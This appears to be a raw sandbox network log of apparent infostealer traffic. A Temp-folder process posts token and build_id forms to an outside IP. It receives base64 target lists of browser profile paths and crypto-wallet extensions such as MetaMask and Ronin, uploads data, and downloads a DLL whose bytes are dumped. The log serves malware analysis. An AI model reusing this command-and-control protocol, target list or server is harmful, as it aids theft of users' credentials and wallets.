                                                                              2024-05-26 08:23:13 UTC1564INData Raw: 36 31 30 0d 0a 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 64 76 62 32 64 73 5a 53 42 44 61 48 4a 76 62 57 55 67 51 32 46 75 59 58 4a 35 66 46 78 48 62 32 39 6e 62 47 56 63 51 32 68 79 62 32 31 6c 49 46 4e 34 55 31 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 4e 6f 63 6d 39 74 61 58 56 74 66 46 78 44 61 48 4a 76 62 57 6c 31 62 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 46 74 61 57 64 76 66 46 78 42 62 57 6c 6e 62 31 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 46 52 76 63 6d 4e 6f 66 46 78 55 62 33 4a 6a 61 46 78 56 63 32 56 79 49 45
                                                                              Data Ascii: 610R29vZ2xlIENocm9tZXxcR29vZ2xlXENocm9tZVxVc2VyIERhdGF8Y2hyb21lfEdvb2dsZSBDaHJvbWUgQ2FuYXJ5fFxHb29nbGVcQ2hyb21lIFN4U1xVc2VyIERhdGF8Y2hyb21lfENocm9taXVtfFxDaHJvbWl1bVxVc2VyIERhdGF8Y2hyb21lfEFtaWdvfFxBbWlnb1xVc2VyIERhdGF8Y2hyb21lfFRvcmNofFxUb3JjaFxVc2VyIE


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              12192.168.2.45266565.109.242.594436620C:\Users\user\AppData\Local\Temp\kat796E.tmp
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-05-26 08:23:14 UTC278OUTPOST / HTTP/1.1
                                                                              Content-Type: multipart/form-data; boundary=----HCBAKJEHDBGHIEBGCGDG
                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
                                                                              Host: 65.109.242.59
                                                                              Content-Length: 331
                                                                              Connection: Keep-Alive
                                                                              Cache-Control: no-cache
                                                                              2024-05-26 08:23:14 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 48 43 42 41 4b 4a 45 48 44 42 47 48 49 45 42 47 43 47 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 32 65 62 66 61 31 39 36 37 39 35 61 61 37 36 38 32 65 37 66 30 37 39 61 35 66 35 39 61 65 37 0d 0a 2d 2d 2d 2d 2d 2d 48 43 42 41 4b 4a 45 48 44 42 47 48 49 45 42 47 43 47 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 34 32 64 30 36 31 38 33 30 34 61 38 38 64 36 34 37 36 62 63 35 35 64 33 33 63 32 33 64 37 65 36 0d 0a 2d 2d 2d 2d 2d 2d 48 43 42 41 4b 4a 45 48 44 42 47 48 49 45 42 47 43 47 44 47 0d 0a 43 6f 6e 74
                                                                              Data Ascii: ------HCBAKJEHDBGHIEBGCGDGContent-Disposition: form-data; name="token"d2ebfa196795aa7682e7f079a5f59ae7------HCBAKJEHDBGHIEBGCGDGContent-Disposition: form-data; name="build_id"42d0618304a88d6476bc55d33c23d7e6------HCBAKJEHDBGHIEBGCGDGCont
                                                                              2024-05-26 08:23:15 UTC158INHTTP/1.1 200 OK
                                                                              Server: nginx
                                                                              Date: Sun, 26 May 2024 08:23:15 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              2024-05-26 08:23:15 UTC5605INData Raw: 31 35 64 38 0d 0a 54 57 56 30 59 55 31 68 63 32 74 38 4d 58 78 75 61 32 4a 70 61 47 5a 69 5a 57 39 6e 59 57 56 68 62 32 56 6f 62 47 56 6d 62 6d 74 76 5a 47 4a 6c 5a 6d 64 77 5a 32 74 75 62 6e 77 78 66 44 42 38 4d 48 78 4e 5a 58 52 68 54 57 46 7a 61 33 77 78 66 47 52 71 59 32 78 6a 61 32 74 6e 62 47 56 6a 61 47 39 76 59 6d 78 75 5a 32 64 6f 5a 47 6c 75 62 57 56 6c 62 57 74 69 5a 32 4e 70 66 44 46 38 4d 48 77 77 66 45 31 6c 64 47 46 4e 59 58 4e 72 66 44 46 38 5a 57 70 69 59 57 78 69 59 57 74 76 63 47 78 6a 61 47 78 6e 61 47 56 6a 5a 47 46 73 62 57 56 6c 5a 57 46 71 62 6d 6c 74 61 47 31 38 4d 58 77 77 66 44 42 38 56 48 4a 76 62 6b 78 70 62 6d 74 38 4d 58 78 70 59 6d 35 6c 61 6d 52 6d 61 6d 31 74 61 33 42 6a 62 6d 78 77 5a 57 4a 72 62 47 31 75 61 32 39 6c 62
                                                                              Data Ascii: 15d8TWV0YU1hc2t8MXxua2JpaGZiZW9nYWVhb2VobGVmbmtvZGJlZmdwZ2tubnwxfDB8MHxNZXRhTWFza3wxfGRqY2xja2tnbGVjaG9vYmxuZ2doZGlubWVlbWtiZ2NpfDF8MHwwfE1ldGFNYXNrfDF8ZWpiYWxiYWtvcGxjaGxnaGVjZGFsbWVlZWFqbmltaG18MXwwfDB8VHJvbkxpbmt8MXxpYm5lamRmam1ta3BjbmxwZWJrbG1ua29lb


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              13192.168.2.45266865.109.242.594436620C:\Users\user\AppData\Local\Temp\kat796E.tmp
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-05-26 08:23:16 UTC278OUTPOST / HTTP/1.1
                                                                              Content-Type: multipart/form-data; boundary=----CGHDAKKJJJKJKECBGCGD
                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
                                                                              Host: 65.109.242.59
                                                                              Content-Length: 332
                                                                              Connection: Keep-Alive
                                                                              Cache-Control: no-cache
                                                                              2024-05-26 08:23:16 UTC332OUTData Raw: 2d 2d 2d 2d 2d 2d 43 47 48 44 41 4b 4b 4a 4a 4a 4b 4a 4b 45 43 42 47 43 47 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 32 65 62 66 61 31 39 36 37 39 35 61 61 37 36 38 32 65 37 66 30 37 39 61 35 66 35 39 61 65 37 0d 0a 2d 2d 2d 2d 2d 2d 43 47 48 44 41 4b 4b 4a 4a 4a 4b 4a 4b 45 43 42 47 43 47 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 34 32 64 30 36 31 38 33 30 34 61 38 38 64 36 34 37 36 62 63 35 35 64 33 33 63 32 33 64 37 65 36 0d 0a 2d 2d 2d 2d 2d 2d 43 47 48 44 41 4b 4b 4a 4a 4a 4b 4a 4b 45 43 42 47 43 47 44 0d 0a 43 6f 6e 74
                                                                              Data Ascii: ------CGHDAKKJJJKJKECBGCGDContent-Disposition: form-data; name="token"d2ebfa196795aa7682e7f079a5f59ae7------CGHDAKKJJJKJKECBGCGDContent-Disposition: form-data; name="build_id"42d0618304a88d6476bc55d33c23d7e6------CGHDAKKJJJKJKECBGCGDCont
                                                                              2024-05-26 08:23:17 UTC158INHTTP/1.1 200 OK
                                                                              Server: nginx
                                                                              Date: Sun, 26 May 2024 08:23:16 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              2024-05-26 08:23:17 UTC119INData Raw: 36 63 0d 0a 54 57 56 30 59 55 31 68 63 32 74 38 4d 58 78 33 5a 57 4a 6c 65 48 52 6c 62 6e 4e 70 62 32 35 41 62 57 56 30 59 57 31 68 63 32 73 75 61 57 39 38 55 6d 39 75 61 57 34 67 56 32 46 73 62 47 56 30 66 44 46 38 63 6d 39 75 61 57 34 74 64 32 46 73 62 47 56 30 51 47 46 34 61 57 56 70 62 6d 5a 70 62 6d 6c 30 65 53 35 6a 62 32 31 38 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: 6cTWV0YU1hc2t8MXx3ZWJleHRlbnNpb25AbWV0YW1hc2suaW98Um9uaW4gV2FsbGV0fDF8cm9uaW4td2FsbGV0QGF4aWVpbmZpbml0eS5jb2180


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              14192.168.2.45266965.109.242.594436620C:\Users\user\AppData\Local\Temp\kat796E.tmp
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-05-26 08:23:18 UTC279OUTPOST / HTTP/1.1
                                                                              Content-Type: multipart/form-data; boundary=----KEBFHIJECFIDGDGCGHCG
                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
                                                                              Host: 65.109.242.59
                                                                              Content-Length: 5645
                                                                              Connection: Keep-Alive
                                                                              Cache-Control: no-cache
                                                                              2024-05-26 08:23:18 UTC5645OUTData Raw: 2d 2d 2d 2d 2d 2d 4b 45 42 46 48 49 4a 45 43 46 49 44 47 44 47 43 47 48 43 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 32 65 62 66 61 31 39 36 37 39 35 61 61 37 36 38 32 65 37 66 30 37 39 61 35 66 35 39 61 65 37 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 42 46 48 49 4a 45 43 46 49 44 47 44 47 43 47 48 43 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 34 32 64 30 36 31 38 33 30 34 61 38 38 64 36 34 37 36 62 63 35 35 64 33 33 63 32 33 64 37 65 36 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 42 46 48 49 4a 45 43 46 49 44 47 44 47 43 47 48 43 47 0d 0a 43 6f 6e 74
                                                                              Data Ascii: ------KEBFHIJECFIDGDGCGHCGContent-Disposition: form-data; name="token"d2ebfa196795aa7682e7f079a5f59ae7------KEBFHIJECFIDGDGCGHCGContent-Disposition: form-data; name="build_id"42d0618304a88d6476bc55d33c23d7e6------KEBFHIJECFIDGDGCGHCGCont
                                                                              2024-05-26 08:23:19 UTC158INHTTP/1.1 200 OK
                                                                              Server: nginx
                                                                              Date: Sun, 26 May 2024 08:23:18 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              2024-05-26 08:23:19 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: 2ok0


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              15192.168.2.45267165.109.242.594436620C:\Users\user\AppData\Local\Temp\kat796E.tmp
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-05-26 08:23:19 UTC194OUTGET /sqls.dll HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
                                                                              Host: 65.109.242.59
                                                                              Connection: Keep-Alive
                                                                              Cache-Control: no-cache
                                                                              2024-05-26 08:23:19 UTC248INHTTP/1.1 200 OK
                                                                              Server: nginx
                                                                              Date: Sun, 26 May 2024 08:23:19 GMT
                                                                              Content-Type: application/octet-stream
                                                                              Content-Length: 2459136
                                                                              Last-Modified: Fri, 24 May 2024 10:18:21 GMT
                                                                              Connection: close
                                                                              ETag: "6650696d-258600"
                                                                              Accept-Ranges: bytes
                                                                              2024-05-26 08:23:19 UTC16136INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 1e d2 37 9f 5a b3 59 cc 5a b3 59 cc 5a b3 59 cc 11 cb 5a cd 6e b3 59 cc 11 cb 5c cd cf b3 59 cc 11 cb 5d cd 7f b3 59 cc 11 cb 58 cd 59 b3 59 cc 5a b3 58 cc d8 b3 59 cc 4f cc 5c cd 45 b3 59 cc 4f cc 5d cd 55 b3 59 cc 4f cc 5a cd 4c b3 59 cc 6c 33 5d cd 5b b3 59 cc 6c 33 59 cd 5b b3 59 cc 6c 33 a6 cc 5b b3 59 cc 6c 33 5b cd 5b b3 59 cc 52 69 63 68 5a b3 59 cc 00 00 00 00 00 00 00
                                                                              Data Ascii: MZ@!L!This program cannot be run in DOS mode.$7ZYZYZYZnY\Y]YXYYZXYO\EYO]UYOZLYl3][Yl3Y[Yl3[Yl3[[YRichZY
                                                                              2024-05-26 08:23:19 UTC16384INData Raw: cd 1e 00 e9 ba 58 1d 00 e9 7e 65 1b 00 e9 1b f0 1c 00 e9 01 21 1c 00 e9 b9 2a 1f 00 e9 d7 46 00 00 e9 92 83 17 00 e9 c5 ed 1e 00 e9 e8 57 03 00 e9 fa 7c 1b 00 e9 3e e1 00 00 e9 bd f4 1a 00 e9 b4 7c 00 00 e9 bf ca 1c 00 e9 4c db 1a 00 e9 31 31 1a 00 e9 34 e5 1c 00 e9 36 f1 1d 00 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc
                                                                              Data Ascii: X~e!*FW|>|L1146
                                                                              2024-05-26 08:23:20 UTC16384INData Raw: 74 12 8a 50 01 3a 51 01 75 0e 83 c0 02 83 c1 02 84 d2 75 e4 33 c0 eb 05 1b c0 83 c8 01 85 c0 74 15 83 c6 0c 47 81 fe c0 03 00 00 72 bf 5f 5e b8 0c 00 00 00 5b c3 8d 0c 7f 8b 14 8d 38 25 24 10 8d 04 8d 34 25 24 10 85 d2 75 09 8b 10 89 14 8d 38 25 24 10 8b 4c 24 18 85 c9 5f 0f 44 ca 5e 89 08 33 c0 5b c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 56 8b 74 24 08 57 33 ff 8b 46 0c 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 53 6a 02 6a ff ff 74 24 1c 56 e8 78 0c 15 00 8b d8 83 c4 10 85 db 74 21 6a 00 ff 74 24 24 ff 74 24 24 ff 74 24 24 53 56 e8 9a 68 04 00 53 56 8b f8 e8 51 39 10 00 83 c4 20 80 7e 57 00 5b
                                                                              Data Ascii: tP:Quu3tGr_^[8%$4%$u8%$L$_D^3[Vt$W3FtPh $Sjjt$Vxt!jt$$t$$t$$SVhSVQ9 ~W[
                                                                              2024-05-26 08:23:20 UTC16384INData Raw: be 0e 83 f9 30 7d e9 89 74 24 74 81 e3 ff ff ff 7f 89 5c 24 30 83 f9 6c 75 35 4e 0f be 4e 01 46 89 74 24 74 85 c9 0f 85 f0 fd ff ff eb 21 0f be 4e 01 46 c6 44 24 37 01 89 74 24 74 83 f9 6c 75 0e 0f be 4e 01 46 89 74 24 74 c6 44 24 37 02 8b 44 24 38 33 f6 89 44 24 58 ba 70 53 21 10 c7 44 24 50 70 53 21 10 c6 44 24 2e 11 0f be 02 3b c8 74 16 83 c2 06 46 81 fa fa 53 21 10 7c ed 8a 4c 24 2e 8b 54 24 50 eb 19 8d 04 76 8a 0c 45 73 53 21 10 8d 14 45 70 53 21 10 89 54 24 50 88 4c 24 2e 0f b6 c1 83 f8 10 0f 87 d9 14 00 00 ff 24 85 24 e1 00 10 c6 44 24 37 01 c6 44 24 43 00 f6 42 02 01 0f 84 97 00 00 00 80 7c 24 2d 00 74 44 8b 74 24 70 8b 56 04 39 16 7f 22 0f 57 c0 66 0f 13 44 24 68 8b 4c 24 6c 8b 74 24 68 8a 54 24 35 89 74 24 28 89 4c 24 58 e9 f4 00 00 00 8b 46 08
                                                                              Data Ascii: 0}t$t\$0lu5NNFt$t!NFD$7t$tluNFt$tD$7D$83D$XpS!D$PpS!D$.;tFS!|L$.T$PvEsS!EpS!T$PL$.$$D$7D$CB|$-tDt$pV9"WfD$hL$lt$hT$5t$(L$XF
                                                                              2024-05-26 08:23:20 UTC16384INData Raw: 24 14 3b c8 73 06 eb 0e 8b 44 24 14 8b c8 89 44 24 20 89 54 24 24 a1 08 22 24 10 03 44 24 10 99 8b f8 8b ea 85 f6 0f 85 6b 01 00 00 3b 6c 24 24 0f 8f 91 00 00 00 7c 08 3b f9 0f 83 87 00 00 00 8b 44 24 10 99 6a 00 8b ca c7 44 24 48 00 00 00 00 8d 54 24 48 89 44 24 38 52 51 50 55 57 89 4c 24 50 e8 38 3a ff ff 40 50 8b 44 24 34 50 8b 80 dc 00 00 00 ff d0 8b f0 83 c4 10 85 f6 75 1e 8b 54 24 1c 8b 44 24 44 55 57 ff 74 24 18 8b 0a ff 70 04 52 8b 41 0c ff d0 83 c4 14 8b f0 8b 44 24 44 85 c0 74 09 50 e8 dd f4 12 00 83 c4 04 03 7c 24 34 8b 4c 24 20 13 6c 24 38 85 f6 0f 84 6a ff ff ff e9 d0 00 00 00 8b 7c 24 1c 8d 4c 24 38 51 57 8b 07 8b 40 18 ff d0 8b f0 83 c4 08 85 f6 0f 85 b2 00 00 00 8b 4c 24 2c 39 4c 24 3c 7c 1e 7f 0a 8b 44 24 14 39 44 24 38 76 12 8b 07 51 ff
                                                                              Data Ascii: $;sD$D$ T$$"$D$k;l$$|;D$jD$HT$HD$8RQPUWL$P8:@PD$4PuT$D$DUWt$pRAD$DtP|$4L$ l$8j|$L$8QW@L$,9L$<|D$9D$8vQ
                                                                              2024-05-26 08:23:20 UTC16384INData Raw: 00 00 33 ff c7 40 0c 00 00 00 00 66 c7 40 11 01 00 8b 44 24 10 56 89 46 40 e8 3a 27 0d 00 83 c4 04 8b f0 eb 08 8b 7c 24 10 8b 74 24 0c 85 ff 0f 84 9d 00 00 00 83 47 10 ff 0f 85 93 00 00 00 ff 4b 3c 83 7f 08 01 75 0d 83 7f 0c 00 75 07 c7 43 1c ff ff ff ff 8b 07 85 c0 74 0e 50 53 e8 46 87 0a 00 83 c4 08 85 c0 75 0a 57 53 e8 38 88 0a 00 83 c4 08 57 53 e8 5e 81 0a 00 83 c4 08 83 3d 18 20 24 10 00 74 42 a1 38 82 24 10 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 57 ff 15 44 20 24 10 29 05 d0 81 24 10 ff 0d f4 81 24 10 57 ff 15 3c 20 24 10 a1 38 82 24 10 83 c4 08 85 c0 74 13 50 ff 15 70 20 24 10 eb 07 57 ff 15 3c 20 24 10 83 c4 04 53 e8 a0 17 0d 00 83 c4 04 8b c6 5f 5e 5b 8b e5 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc
                                                                              Data Ascii: 3@f@D$VF@:'|$t$GK<uuCtPSFuWS8WS^= $tB8$tPh $WD $)$$W< $8$tPp $W< $S_^[]
                                                                              2024-05-26 08:23:20 UTC16384INData Raw: ff ff 0f b7 86 90 00 00 00 8b de 8b 54 24 10 8b 4c 24 24 8b 6c 24 20 89 47 10 8b 86 98 00 00 00 c1 e8 06 83 e0 01 89 54 24 10 89 47 14 80 bb 97 00 00 00 02 89 4c 24 14 0f 85 c8 fe ff ff b8 01 00 00 00 89 4c 24 14 89 54 24 10 e9 b8 fe ff ff 5f 5e 5d b8 07 00 00 00 5b 83 c4 18 c3 5f 5e 5d 33 c0 5b 83 c4 18 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc
                                                                              Data Ascii: T$L$$l$ GT$GL$L$T$_^][_^]3[
                                                                              2024-05-26 08:23:20 UTC16384INData Raw: cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 56 8b 74 24 08 57 8b 7c 24 14 8b 46 10 8b 56 0c 8d 0c 80 8b 42 68 ff 74 88 fc ff 77 04 ff 37 e8 ac f3 11 00 83 c4 0c 85 c0 74 0b ff 37 56 e8 d3 67 fe ff 83 c4 08 5f 5e c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 6a 00 6a 01 6a ff 68 2c 67 21 10 ff 74 24 14 e8 bc d7 0d 00 83 c4 14 c3 cc cc cc cc cc cc cc cc 6a 00 6a 01 6a ff 68
                                                                              Data Ascii: Vt$W|$FVBhtw7t7Vg_^jjjh,g!t$jjjh
                                                                              2024-05-26 08:23:20 UTC16384INData Raw: 71 14 8b 41 08 f7 76 34 8b 46 38 8d 14 90 8b 02 3b c1 74 0d 0f 1f 40 00 8d 50 10 8b 02 3b c1 75 f7 8b 40 10 89 02 ff 4e 30 66 83 79 0c 00 8b 71 14 74 10 8b 46 3c 89 41 10 8b 46 04 89 4e 3c 5e ff 08 c3 ff 31 e8 6e 5a 0a 00 8b 46 04 83 c4 04 ff 08 5e c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 8b 4c 24 04 8b 54 24 10 56 57 8b 71 0c 85 f6 74 3c 8b 06 83 f8 01 74 1f 83 f8 02 74 1a 83 f8 05 74 15 33 ff 83 f8 03 75 26 bf 01 00 00 00 85 d7 74 1d 5f 33 c0 5e c3 83 7c 24 10 01 75 f4 83 7c 24 14 01 75 ed 5f b8 05 00 00 00 5e c3 33 ff 8b 41 04 52 ff 74 24 18 8b 08 ff 74 24 18 50 8b 41 38 ff d0 83 c4 10 85 ff 74 1c 85 c0 75 18 8b 4c 24 14 ba 01 00 00 00 d3 e2 8b 4c 24 10 4a d3 e2 09 96 c4 00 00 00 5f
                                                                              Data Ascii: qAv4F8;t@P;u@N0fyqtF<AFN<^1nZF^L$T$VWqt<ttt3u&t_3^|$u|$u_^3ARt$t$PA8tuL$L$J_
                                                                              2024-05-26 08:23:20 UTC16384INData Raw: cc cc cc cc cc cc cc cc 56 8b 74 24 08 57 8b 46 0c 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 6a 00 6a 00 68 50 45 24 10 68 e8 40 22 10 56 e8 25 83 14 00 83 c4 14 80 7e 57 00 75 04 33 ff eb 0d 6a 00 56 e8 d0 b5 01 00 83 c4 08 8b f8 8b 46 0c 85 c0 74 0a 50 ff 15 70 20 24 10 83 c4 04 8b c7 5f 5e c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 53 56 57 8b 7c 24 10 ff b7 dc 00 00 00 e8 6d f6 fd ff 83 c4 04 8d 77 3c bb 28 00 00 00 0f 1f 00 ff 36 e8 58 f6 fd ff 83 c4 04 8d 76 04 83 eb 01 75 ee 8b b7 f8 00 00 00 85 f6 74 54 39 1d 18 20 24 10 74 42 a1 38 82 24 10 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 56 ff 15 44 20 24 10 29 05 d0 81 24 10 ff 0d f4 81 24 10 56 ff 15 3c 20 24 10 a1 38 82 24 10 83
                                                                              Data Ascii: Vt$WFtPh $jjhPE$h@"V%~Wu3jVFtPp $_^SVW|$mw<(6XvutT9 $tB8$tPh $VD $)$$V< $8$


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              16192.168.2.45267465.109.242.594436620C:\Users\user\AppData\Local\Temp\kat796E.tmp
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-05-26 08:23:22 UTC279OUTPOST / HTTP/1.1
                                                                              Content-Type: multipart/form-data; boundary=----EBGCFBGCBFHJECBGDAKK
                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
                                                                              Host: 65.109.242.59
                                                                              Content-Length: 4677
                                                                              Connection: Keep-Alive
                                                                              Cache-Control: no-cache
                                                                              2024-05-26 08:23:22 UTC4677OUTData Raw: 2d 2d 2d 2d 2d 2d 45 42 47 43 46 42 47 43 42 46 48 4a 45 43 42 47 44 41 4b 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 32 65 62 66 61 31 39 36 37 39 35 61 61 37 36 38 32 65 37 66 30 37 39 61 35 66 35 39 61 65 37 0d 0a 2d 2d 2d 2d 2d 2d 45 42 47 43 46 42 47 43 42 46 48 4a 45 43 42 47 44 41 4b 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 34 32 64 30 36 31 38 33 30 34 61 38 38 64 36 34 37 36 62 63 35 35 64 33 33 63 32 33 64 37 65 36 0d 0a 2d 2d 2d 2d 2d 2d 45 42 47 43 46 42 47 43 42 46 48 4a 45 43 42 47 44 41 4b 4b 0d 0a 43 6f 6e 74
                                                                              Data Ascii: ------EBGCFBGCBFHJECBGDAKKContent-Disposition: form-data; name="token"d2ebfa196795aa7682e7f079a5f59ae7------EBGCFBGCBFHJECBGDAKKContent-Disposition: form-data; name="build_id"42d0618304a88d6476bc55d33c23d7e6------EBGCFBGCBFHJECBGDAKKCont
                                                                              2024-05-26 08:23:23 UTC158INHTTP/1.1 200 OK
                                                                              Server: nginx
                                                                              Date: Sun, 26 May 2024 08:23:23 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              2024-05-26 08:23:23 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: 2ok0


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              17192.168.2.45267565.109.242.594436620C:\Users\user\AppData\Local\Temp\kat796E.tmp
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-05-26 08:23:24 UTC279OUTPOST / HTTP/1.1
                                                                              Content-Type: multipart/form-data; boundary=----DGIJEGHDAECAKECAFCAK
                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
                                                                              Host: 65.109.242.59
                                                                              Content-Length: 1529
                                                                              Connection: Keep-Alive
                                                                              Cache-Control: no-cache
